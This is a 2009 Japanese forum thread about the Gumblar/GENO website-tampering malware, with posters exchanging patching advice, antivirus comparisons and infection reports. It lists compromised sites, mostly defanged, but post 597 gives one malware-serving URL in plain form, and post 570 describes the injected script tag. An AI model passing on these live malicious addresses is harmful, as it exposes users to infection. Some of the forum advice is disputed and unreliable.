468名無しさん@お腹いっぱい。:2009/10/25(日) 19:04:29
>>450
Google先生は、AS番号ごとにウイルス感染サイト(gumbler以外も含む)を教えてくれるよ。

例えば、
楽天(infoseek.co.jp、cool.ne.jp)
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820
Softbank(geocities.jp)
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816
とかね。

最近までgumblar/martuzに改竄されて放置されてたサイトは、
新型に改竄されてる可能性が高い。
469あげ:2009/10/25(日) 20:08:52
http://fileseek.jp/(携帯専用)
PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから
簡易チェッカーとして使えるかもしれん。
※パケ定必須
470名無しさん@お腹いっぱい。:2009/10/25(日) 22:05:38
>>465
ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか
471名無しさん@お腹いっぱい。:2009/10/25(日) 22:19:28
バスター最新にしても駄目?
472名無しさん@お腹いっぱい。:2009/10/25(日) 22:43:57
>>471
それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない
473名無しさん@お腹いっぱい。:2009/10/25(日) 22:45:00
>>470
分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる
474名無しさん@お腹いっぱい。:2009/10/25(日) 23:10:28
アップデート全部したんだが、これで再起動しても平気かな?
475名無しさん@お腹いっぱい。:2009/10/25(日) 23:14:00
ソフトの更新は予防のためにするものであって
感染後にやっても手遅れだよ
476名無しさん@お腹いっぱい。:2009/10/25(日) 23:14:15
/(^o^)\
477名無しさん@お腹いっぱい。:2009/10/25(日) 23:14:51
>>474
カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ
478名無しさん@お腹いっぱい。:2009/10/25(日) 23:14:56
>>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。

ikebananonohana●hp●infoseek●co●jp
pengzipk●hp●infoseek●co●jp
seiya06●hp●infoseek●co●jp
pee3●hp●infoseek●co●jp
www●ski-srsc●com
www●geocities●jp/fumisugi43/
www●geocities●jp/jr1ujx/
www●geocities●jp/tileaf05/
www●jpla-aichi●com

こりゃ、国内60サイトどころじゃないでしょ。
479名無しさん@お腹いっぱい。:2009/10/25(日) 23:15:55
>>477
現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。
機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。
また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。
480名無しさん@お腹いっぱい。:2009/10/25(日) 23:17:51
ニフティもエンジンはカスペだからそっちでやればいいんじゃね
481名無しさん@お腹いっぱい。:2009/10/25(日) 23:18:41
>>474
ちなみに全部ってのは本当に全部やったの?
たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ
482473:2009/10/25(日) 23:23:45
さらに色々調べたが
ノートンはファイルの検査では検出しないけど
ブラウザで読み込むと検出する
サイトアドレスではなくファイルで検出するようだ

この後バスター入れて試してみる
483473:2009/10/26(月) 00:10:01
バスター入れてみたが試した範囲ではすべて遮断される
ただデスクトップにおいたphpファイルは読み込める
2度目以降は無効になるような場合でも遮断される
サイトアドレスで遮断してるように思えるがよく分からない
484名無しさん@お腹いっぱい。:2009/10/26(月) 00:29:06
>>483
調査乙
485名無しさん@お腹いっぱい。:2009/10/26(月) 00:48:20
>>483
激乙です!
てことは大抵のアンチウイルスソフト入れてる人は
感染したサイト見ても、とりあえず感染は防げてるってことなのかな
マカフィーはどうだろう
486名無しさん@お腹いっぱい。:2009/10/26(月) 00:56:15
>>485みたいのが一番危ないタイプだな
487473:2009/10/26(月) 00:58:05
>>485
その前に試したPandaは読み込めちゃったね
違う段階で遮断できるかも知れないけど
488名無しさん@お腹いっぱい。:2009/10/26(月) 01:05:20
>>486
アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、
adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな…

>>487
そっかー
即レスありがとう
489名無しさん@お腹いっぱい。:2009/10/26(月) 01:19:27
>>488
心配ならOSいれなおし
490名無しさん@お腹いっぱい。:2009/10/26(月) 01:26:06
データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね?
このウイルスはそんなことないとかないかorz
491名無しさん@お腹いっぱい。:2009/10/26(月) 01:47:59
>>488
セコムに入っているから大丈夫!と鍵をかけずに外出したようなものだね
モノに頼ってそれに過信してしまって
一番肝心なところである
それを使う人間がセキュリティへの認識を忘れてしまっては
どんなに優れたモノを使っていても意味をなさないよ
492名無しさん@お腹いっぱい。:2009/10/26(月) 01:51:13
アップデートは最低でもこれくらいやらないとな

Windows Update / Microsoft Update
Adobe Flash Player 10.0.32.18 (IEと非IE両方)
Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る)

上記は現段階の新型Daonol/Gumblarには必須
亜種でどうなるか分からないので下記も実施

Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい)
Java 6 Update 16 (旧バージョンはすべてアンインストール)

あとはQuickTimeとRealPlayerあたりか
使わないものはアンインストールだな
493名無しさん@お腹いっぱい。:2009/10/26(月) 01:53:31
>>490
確実に大丈夫とはいえない
494名無しさん@お腹いっぱい。:2009/10/26(月) 02:00:49
今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの?
495名無しさん@お腹いっぱい。:2009/10/26(月) 02:04:00
もうFlashなんかやめてSilverlightを採用すればいいのに
496名無しさん@お腹いっぱい。:2009/10/26(月) 02:05:06
Windows Updateぐらい自動更新の設定にしとこうよ
というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに
497名無しさん@お腹いっぱい。:2009/10/26(月) 02:05:44
「ぜいじゃく」って読むんだよ、ぼうや
498名無しさん@お腹いっぱい。:2009/10/26(月) 02:08:04
きじゃくてwww
言語弱者もいいとこwww
499名無しさん@お腹いっぱい。:2009/10/26(月) 02:08:49
釣られんなよw
500名無しさん@お腹いっぱい。:2009/10/26(月) 02:11:04
後釣り宣言カコワルイ
501名無しさん@お腹いっぱい。:2009/10/26(月) 02:13:52
生酒でも飲んでまったりやろうや
502名無しさん@お腹いっぱい。:2009/10/26(月) 02:18:19
この時間から酒飲むと朝つらいからお断りします
503名無しさん@お腹いっぱい。:2009/10/26(月) 02:23:56
>>494
特定の脆弱性だけじゃなく複数利用してる
Adobe製品だけじゃなくMicrosoftのもあった
いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ
504名無しさん@お腹いっぱい。:2009/10/26(月) 02:37:29
【中卒の為の国語辞典】

脆弱性 【ぜいじゃくせい】

脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。
505名無しさん@お腹いっぱい。:2009/10/26(月) 03:02:18
前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく
ウイルスじゃないから、感染してからバックアップとっても
平気とかどこかで見た気がする。
もちろんデータをクリーンインストールしてから戻すときは
当然ウイルスチェックしてからということだったけど。
506名無しさん@お腹いっぱい。:2009/10/26(月) 03:05:13
ぜいじゃく性ですね
すみません
本当に恥ずかしい間違いでした
教えてくれてありがとうございます
507名無しさん@お腹いっぱい。:2009/10/26(月) 03:15:35
本当の読み方はぜいじゃくしょう
ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった
豆知識
508名無しさん@お腹いっぱい。:2009/10/26(月) 03:39:39
>>507
恥ずかしい限りですが勉強になります

やっぱりアップデートとかをこまめにするのが一番ですが
今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は
OS再インスコしなくて良さそう?なのかな?
509名無しさん@お腹いっぱい。:2009/10/26(月) 03:41:22
カスペで駆除できたって報告あるか?
510名無しさん@お腹いっぱい。:2009/10/26(月) 03:50:26
ありますんね・・・
511名無しさん@お腹いっぱい。:2009/10/26(月) 03:52:09
カスペ自らが宣言してるけどどこまで対応してるのかわからん
http://www.kaspersky.co.jp/news?id=207578788
512名無しさん@お腹いっぱい。:2009/10/26(月) 03:52:29
試しに感染してみるか
古いアドビのソフトがあれば
513名無しさん@お腹いっぱい。:2009/10/26(月) 04:03:41
無駄無駄
アンチウィルスソフトに過剰な期待を抱かないほうがいい
日々、腐るほど亜種が湧いてるからな
514名無しさん@お腹いっぱい。:2009/10/26(月) 04:07:04
そのうちvistaや7も感染対象になるのかね
515名無しさん@お腹いっぱい。:2009/10/26(月) 04:07:25
カスペもオンラインスキャナをメンテ中とか鬼だよな。
516名無しさん@お腹いっぱい。:2009/10/26(月) 07:11:48
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
http://www.forest.impress.co.jp/docs/review/20091020_323014.html
http://hide9999.web.fc2.com/
517名無しさん@お腹いっぱい。:2009/10/26(月) 07:13:03
既出
もともと自動
518名無しさん@お腹いっぱい。:2009/10/26(月) 07:14:02
無料駆除ツールでてますか?
カスペ体験版入れるしかないのか・・・
519名無しさん@お腹いっぱい。:2009/10/26(月) 07:23:46
体験版じゃなくて製品版買えばいいだろ
520名無しさん@お腹いっぱい。:2009/10/26(月) 11:45:48
HD買ってきてOSインストールして
外したHDを外付けにしてバスター2010でウイルススキャン
トロイ式なんとかかんとか と出て隔離に成功

なんでも最新がいいんだなと思って IEは6から8へ
バスターも06から10へ

正直新しいPC買ったみたいです(^O^)
521名無しさん@お腹いっぱい。:2009/10/26(月) 14:46:01
>>420
富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、
富士通にならってリリース出しました。

【お詫び】電話お問い合わせ窓口の混雑について
ttp://121ware.com/navigate/support/121cc/info/20091026/

東芝
ttp://dynabook.com/assistpc/info/20091022.htm
SONY
ttp://search.vaio.sony.co.jp/solution/S0910211068384/
DELL
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022
522名無しさん@お腹いっぱい。:2009/10/26(月) 15:09:12
>>521
一昨日だっけか?東芝のサポートって類似の質問はないとか言って蹴ってなかったか?
523名無しさん@お腹いっぱい。:2009/10/26(月) 15:32:57
>>508
前回のも普通に駆除できるから
無知が作ったウィキなんて信用するなよ
524名無しさん@お腹いっぱい。:2009/10/26(月) 16:20:54
SonyはVistaも対象に含めているのか
525名無しさん@お腹いっぱい。:2009/10/26(月) 20:01:40
なんだろこれ・・・

www■idealgroup-24■com/
→ theflyingpoodles■com/images/DSC_0035■php
→ chezmichel■nl/images/index3■php
→ bellsworld■com/new_submissions/verhor1■php
→ psunrise■cn/images-d/index2■php (アクセス拒否)

最後のアクセス拒否以外の中身が妙な404で AguseGatewayで見ると//404
ソース見るといずれも // iframes are EVIL! Hate Zeus!  というメッセージ付き
526名無しさん@お腹いっぱい。:2009/10/26(月) 20:13:14
なんで
527名無しさん@お腹いっぱい。:2009/10/26(月) 20:13:54
途中送信orz

なんでabout:blank開いてんだこれ
本当に404なら分かるけど
528名無しさん@お腹いっぱい。:2009/10/26(月) 20:18:49
>>524
でもソニーはウイルス名の指定がないな。
とにかくリカバリしやがれ(意訳)の一点張り。あんまりあてにできないのでは。
529名無しさん@お腹いっぱい。:2009/10/26(月) 20:23:58
530名無しさん@お腹いっぱい。:2009/10/26(月) 20:25:43
Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045
25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、
Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
G Dataが「JS:Downloader-EZ」で13件を検出した。
ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。
531名無しさん@お腹いっぱい。:2009/10/26(月) 21:06:13
http://japan.internet.com/webtech/20091010/12.html
>Adobe の勧告には、次のような記述がある。
>「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している
>Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。

10/13のAcrobatの脆弱性ですが
VISTAでもDEPが無効だと駄目だったようですね。
VISTAがプレインストールされているPCだと
CPUがDEPにまず対応している気がしますが・・・
532名無しさん@お腹いっぱい。:2009/10/26(月) 21:44:06
XPでハードウェアDEPが有効かつ
IE8のメモリ保護が有効だった場合はどうなんでしょうね・・・
VISTAと同様の結果になるのか、違うのか・・・
533名無しさん@お腹いっぱい。:2009/10/26(月) 23:17:04
ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって
上のほうで言われてるから調べてみた。
■FlashPlayer
http://www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html
■AdobeReader(9.20は編集>環境設定>アップデーターでできた)
http://www.geocities.jp/fssreport/update/article003/index.html

>Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、
>ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。

FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、
ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。
534名無しさん@お腹いっぱい。:2009/10/26(月) 23:32:53
Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト

自動でアップデートするものでは無いから大差ない
535名無しさん@お腹いっぱい。:2009/10/26(月) 23:53:50
>>533
いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど
アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね
536名無しさん@お腹いっぱい。:2009/10/26(月) 23:54:31
主導→手動でしたごめん
537名無しさん@お腹いっぱい。:2009/10/27(火) 00:13:54
Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない
アップデートは手動、Adobeのサイト言ってチェックしないといけない
538名無しさん@お腹いっぱい。:2009/10/27(火) 00:22:16
過去の更新状況から考えると
更新があった場合はコンテンツが表示されたあとで
更新のダイアログが表示されていたはずだから
>>533の場合は既に攻撃を喰らったあとだろう
539533:2009/10/27(火) 00:47:38
レスくれたひとありがとう。

Flash_Reader_Updateは半自動化しかしてくれなくても、
インターネット前に必ずアップデートするとか、
>>387の記事のように、タスクスケジューラ使うようにすれば、
>>533みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。
ソフトDLすることにするわ。
記事みて検索してはじめて、タスクスケジューラを知った初心者だけどw
540名無しさん@お腹いっぱい。:2009/10/27(火) 00:50:55
すまん感染の疑いのある者なんだがご教授願いたい
当方win機(一昨日買ったばかりwin7)とMac(OSX10.4)を使っている。
これらを使ってxoopsを使ったサイトを立ち上げようとした。
xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。
しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。
このエラーをググったらGENOウイルスの仕業らしい、と。

自分的には可能性として
1.win機が感染している
2.Mac機が感染、もしくは保菌者(?)になっている
3.レンタルサーバーの業者自体が感染している

なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態
Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態

現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。
541名無しさん@お腹いっぱい。:2009/10/27(火) 01:17:31
>>540
前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、
そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、
上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか
確実にわかるんじゃないかな

今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、
むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った
ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが
542名無しさん@お腹いっぱい。:2009/10/27(火) 01:34:17
>>541
ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。
Macのほうはメインマシンだから1日かかりそう><
とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる
543名無しさん@お腹いっぱい。:2009/10/27(火) 01:52:04
Avast!がPDFの検出をするようになった
SWFは未確認
544名無しさん@お腹いっぱい。:2009/10/27(火) 02:02:39
もうすぐnortonの期限が切れそうでどれにしようか迷っている
ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・
カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象
545名無しさん@お腹いっぱい。:2009/10/27(火) 02:05:35
スレ違いっぽいが
GENOの話ならノートンは対応してるぞ
546名無しさん@お腹いっぱい。:2009/10/27(火) 02:10:38
新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい
flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう
547名無しさん@お腹いっぱい。:2009/10/27(火) 02:13:07
一口にGENO(新旧gamblar)と言っても、いくつものファイルが関係するから
ウイルス対策ソフトがどの段階で検知するかはマチマチ
全部スルーして、穴があるシステムはやられる
548名無しさん@お腹いっぱい。:2009/10/27(火) 02:14:39
MSの脆弱だけじゃないからね。
Adobeの脆弱性はノートンはやってくれないし。
549名無しさん@お腹いっぱい。:2009/10/27(火) 02:16:51
>>548
やってくれないとは?
間違いだと思うが
550名無しさん@お腹いっぱい。:2009/10/27(火) 02:19:31
嘘ばっかり言いやがるからな
2chだし適当に
551名無しさん@お腹いっぱい。:2009/10/27(火) 02:19:31
>>530
http://www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880

> Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
> G Dataが「JS:Downloader-EZ」で13件を検出した。

G DataのEZって…
552名無しさん@お腹いっぱい。:2009/10/27(火) 02:24:38
>>546
ベストかもしれないが、現実的には_
うちの事務所は、みんなXPだし
とりあえず、うpだて最新にしとくことか…
553名無しさん@お腹いっぱい。:2009/10/27(火) 02:32:28
そういえばアドビやSunJavaのブラッドハウンドは見たことないね
554名無しさん@お腹いっぱい。:2009/10/27(火) 02:37:29
>>546
個人なら切り替えはまだ容易だろうが
企業、特に中小企業だと業務用のPC全てを
XPから切り替えるのは容易ではない
555名無しさん@お腹いっぱい。:2009/10/27(火) 02:41:37
このスレを覗きに来るような人たちには釈迦に説法だろうけど、
パッチ管理は多少面倒でももっとも効果的な対策
個人利用は無料のSecunia PSIで定期的なチェックをお勧め

Secunia Personal Software Inspector(PSI)ダウンロードページ
ttp://secunia.com/vulnerability_scanning/personal/
日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも
556名無しさん@お腹いっぱい。:2009/10/27(火) 03:06:16
>>548-550
>>553

> 嘘ばっかり言いやがるからな
> 2chだし適当に

ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp
こちらを自分の目でご覧になりました?
557名無しさん@お腹いっぱい。:2009/10/27(火) 03:11:55
>>556
何を言いたいんだ?
書いてあるねってことかな
558名無しさん@お腹いっぱい。:2009/10/27(火) 06:54:08
今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は
カスペやAvastやノートン?でスキャンすれば検出や駆除が
きちんとできると思っていいのかな?
それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。
またすぐに違う亜種がでたらそれは別だろうけど。
559名無しさん@お腹いっぱい。:2009/10/27(火) 07:09:31
>>539
タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。
新バージョンで「Quietモード」が追加されてる。
http://hide9999.web.fc2.com/
560名無しさん@お腹いっぱい。:2009/10/27(火) 16:58:43
Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到
ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047
561名無しさん@お腹いっぱい。:2009/10/27(火) 18:22:52
感染したHDドライブをスキャン中。
ノートンひっかかってくれるかな。。。
562名無しさん@お腹いっぱい。:2009/10/27(火) 18:30:55
未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。
563名無しさん@お腹いっぱい。:2009/10/27(火) 18:37:47
くるくるたああああああああああああああああいむ
564名無しさん@お腹いっぱい。:2009/10/27(火) 18:51:34
すでに10万ファイル調べてるのにひっかからん

くるくるたああああああああああああいむ
565名無しさん@お腹いっぱい。:2009/10/27(火) 18:59:10
Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが
こういった一時的な利用なら
カスペルとAVASTの両方の検索エンジンを搭載した
G-DATAでスキャンしてみるのも良いかもしれない
566名無しさん@お腹いっぱい。:2009/10/27(火) 19:01:59
>>561
ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか?
567名無しさん@お腹いっぱい。:2009/10/27(火) 19:06:11
今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね
568名無しさん@お腹いっぱい。:2009/10/28(水) 00:57:50
だから良くなったんだろ
569名無しさん@お腹いっぱい。:2009/10/28(水) 04:46:17
www●george-ohtsuka●com
これはGENOですか?別のウイルス?
570名無しさん@お腹いっぱい。:2009/10/28(水) 05:46:27
>>569
流行のGENO踏み台型感染(Web改ざん)タイプ、サイト管理人のPCも感染してる

</head>と<body>の間にscriptを1行仕込まれている
script src=●●●●//psunrise●cn/images-d/index2●php

571名無しさん@お腹いっぱい。:2009/10/28(水) 06:31:28
>>569
あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい
どうしてオランダ?
572名無しさん@お腹いっぱい。:2009/10/28(水) 07:27:02
>>569
新型GENO(gumblar.x)と、iframeインジェクションの両方に改竄されてるね。

ちなみに>>525の報告のように、
gumblar一派とiframeインジェクション一派は抗争中らしいw
ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27
ttp://ilion.blog47.fc2.com/blog-entry-155.html

ショバ(botに引き込む無防備なPC)を取り合ってるのだろうか。
573名無しさん@お腹いっぱい。:2009/10/28(水) 14:40:46
感染したHDD、定義済みノートンで検知せず。
カスペでスキャン中。
やっぱりリカバリしかないのかな。
どっちにしろレジストリいじらなきゃだめか。
574名無しさん@お腹いっぱい。:2009/10/28(水) 16:53:40
>>573
リカバリしてもレジストリいじらなきゃだめなの?
575名無しさん@お腹いっぱい。:2009/10/28(水) 17:19:46
リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。
576名無しさん@お腹いっぱい。:2009/10/28(水) 20:59:36
>>573
どうして感染したと分かるの?

起動時に黒い画面?
黒い画面だと、どうやってPCを起動させて、スキャンしてるの?
577名無しさん@お腹いっぱい。:2009/10/28(水) 21:03:05
IQが低いとそんな書き込みしかできない
578名無しさん@お腹いっぱい。:2009/10/28(水) 21:25:51
PCが、いちだ〜い、にだ〜い、…
ヒュ〜、どろどろどろ…
579名無しさん@お腹いっぱい。:2009/10/28(水) 21:58:53
>>575
ドライブがリカバリディスクを認識するものの
数時間まっても始まらないから、そこらへんもやられちゃってると思う。

調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。

一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。
スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。

とりあえず1症例として書いてみました。
580名無しさん@お腹いっぱい。:2009/10/28(水) 23:07:03
それは別のもんに感染してるんじゃないの
あとCDもしくはDVDドライブからの起動にしてる?
581579:2009/10/28(水) 23:36:31
カスペのスキャン後に復活したみたいです。
ありがたいことにレジストリまで修正してくれるみたいだ。
駆除リストから詳細を調べたいが、
カスペがウィルスリストをぜんぜん登録してくれてない。。。

不具合としては、ユーザープロファイルが読み込めなる様子。
アカウント移行すれば問題ないです。

>>580
今回のでビンゴだったみたいです、
カスペの公式サイトのウイルス名と違ったもので。
ありがとうございます。
582名無しさん@お腹いっぱい。:2009/10/28(水) 23:41:55
検出名隠蔽してたら誰もわからんわな
583名無しさん@お腹いっぱい。:2009/10/29(木) 08:53:46
これはGENOウイルスでしょうか?

症状:
Vistaにて
起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
セーフモードだと起動。
regeditとcmdは起動。
sqlsodbc.chmも存在。ファイルサイズは通常通り。

どうでしょうか?
584名無しさん@お腹いっぱい。:2009/10/29(木) 11:43:10
1.感染したマシンからHDD抜く
2.HDDケースに入れる
3.感染していないPCにカスペたん入れる
4.感染しているHDDを外付けで3.のマシンに接続
5.スキャン

で駆除できるのかな?

人柱も嫌だし感染マシンが無いので検証してないけど
585名無しさん@お腹いっぱい。:2009/10/29(木) 15:34:50
>>583
>起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
この症状はもろにそんなかんじだね
586名無しさん@お腹いっぱい。:2009/10/29(木) 18:05:01
>>583
UAC切ってたのか?
587名無しさん@お腹いっぱい。:2009/10/30(金) 08:52:48
>>583
いえ、ONにしてました。
悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。
588名無しさん@お腹いっぱい。:2009/10/30(金) 14:53:51
利用してる脆弱性はAdobeだけじゃないんでなんとも
まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね
589名無しさん@お腹いっぱい。:2009/10/30(金) 17:16:28
構造的には現状ではUACはスルーできんはずだが?
特にvistaのUACは7のデフォルト設定より粘着質
勢いで許可したかupdateのフェイクにでも引っかかったか
590名無しさん@お腹いっぱい。:2009/10/30(金) 17:26:15
>>583
カスペルのオンラインスキャナーではどうなりました?
591名無しさん@お腹いっぱい。:2009/10/30(金) 18:41:44
>>583
それGENOじゃあないだろ
Daonolだと思うんだが?
592名無しさん@お腹いっぱい。:2009/10/30(金) 18:51:27
Daonolはvistaは対象外で手口もGENOとそう変わらない
593名無しさん@お腹いっぱい。:2009/10/31(土) 02:12:59
じゃあなんなんだ
別のウイルスかハードの寿命か
594名無しさん@お腹いっぱい。:2009/10/31(土) 10:30:44
パソコンのことはよく知らずにいたのが
わるかったんだけどなんかうちのサイト、感染したっぽい。

avast!が反応するようになっちゃった。
ファイル名 ttp://hd-select●com/blog/mail/mail_test.php
マルウェア名 JS:Redirector-H7 [Trj]

って出るんです。
ファイル名のサイト、バイクの通販かなんかだがこんなサイト
いったことないのになあ。

感染確認の類は全部やって異常は見られなかったけど
悲しいかな、サイトは削除しました。
595名無しさん@お腹いっぱい。:2009/10/31(土) 18:08:11
典型的なGENOですね
バイクの通販サイトは・・・多分、あそこかなw
596名無しさん@お腹いっぱい。:2009/11/01(日) 00:08:38
質問させてください
OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓
http://fancyrat●ru/cgi-bin/pomet2008●php

とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。
597名無しさん@お腹いっぱい。:2009/11/01(日) 00:12:15
要求されたURLのWebページを表示できません
URL:
http://fancyrat.ru/cgi-bin/pomet2008.php
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x
598名無しさん@お腹いっぱい。:2009/11/01(日) 00:12:58
aaa
miss
url変えてなかった。
開かんでおくれ。
599名無しさん@お腹いっぱい。:2009/11/01(日) 00:44:40
>>594
関係ないサイトのコードが注入されるのが典型的なパターン
サイトは削除だけじゃなくそのサイト自体が無効にならないと
そのままのっとられる可能性があるので注意してください

感染確認というのが旧型Genoの確認方法だとしたら意味がないので
カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください
600名無しさん@お腹いっぱい。:2009/11/01(日) 00:45:56
>>596
はい
新型のほうのGenoです
スキャンは他のメーカーのでもしてみてね
601名無しさん@お腹いっぱい。:2009/11/01(日) 01:00:36
レス下さった方ありがとうございます、新型なんですね……
バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。
602名無しさん@お腹いっぱい。:2009/11/01(日) 02:29:58
最新の定義ならブロックしてくれてる可能性もあるが
まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう
603名無しさん@お腹いっぱい。:2009/11/01(日) 03:26:46
firefox用のpdfプラグインは9.1.0.163が最新?
readerは9.2だけどこれでいいのかな
604名無しさん@お腹いっぱい。:2009/11/01(日) 03:40:56
今更だけどなんでこうなったという感じだな
去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった
一体、Gumblarの作者は何を考えて作ったんだろうか
vistaだけど巡回しまくるから油断はできないな
605名無しさん@お腹いっぱい。:2009/11/01(日) 14:01:26
>>597
情報収集をするためにこのスレをロムっていたが
ミスって踏んでしまった…
606名無しさん@お腹いっぱい。:2009/11/01(日) 14:20:11
>>605
大丈夫?
607605:2009/11/01(日) 19:42:24
>>606
まとめの感染確認方法で調べてみましたが
一応、セーフでした、お騒がせして申し訳ありません。
608名無しさん@お腹いっぱい。:2009/11/01(日) 20:19:53
それは意味ないと何度言えば
609名無しさん@お腹いっぱい。:2009/11/01(日) 21:12:40
vista/7ならおそらくセーフ
XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも
新型が未知のセキュリティホールを突いていたらの話だけど
610名無しさん@お腹いっぱい。:2009/11/01(日) 22:11:53
GENOに限った話ではないのですが、
ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に
的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか?
611名無しさん@お腹いっぱい。:2009/11/01(日) 22:44:39
>>610
メールで教えるのは考え直した方がいいかと
612名無しさん@お腹いっぱい。:2009/11/01(日) 23:53:21
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
613名無しさん@お腹いっぱい。:2009/11/02(月) 16:11:17
>>597
こういう判定ってどこでできるの?
614名無しさん@お腹いっぱい。:2009/11/02(月) 17:34:15
aguseで確認すればいいだろ。
615名無しさん@お腹いっぱい。:2009/11/02(月) 19:55:16
過信は禁物だけどな
616610:2009/11/02(月) 20:48:14
調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。

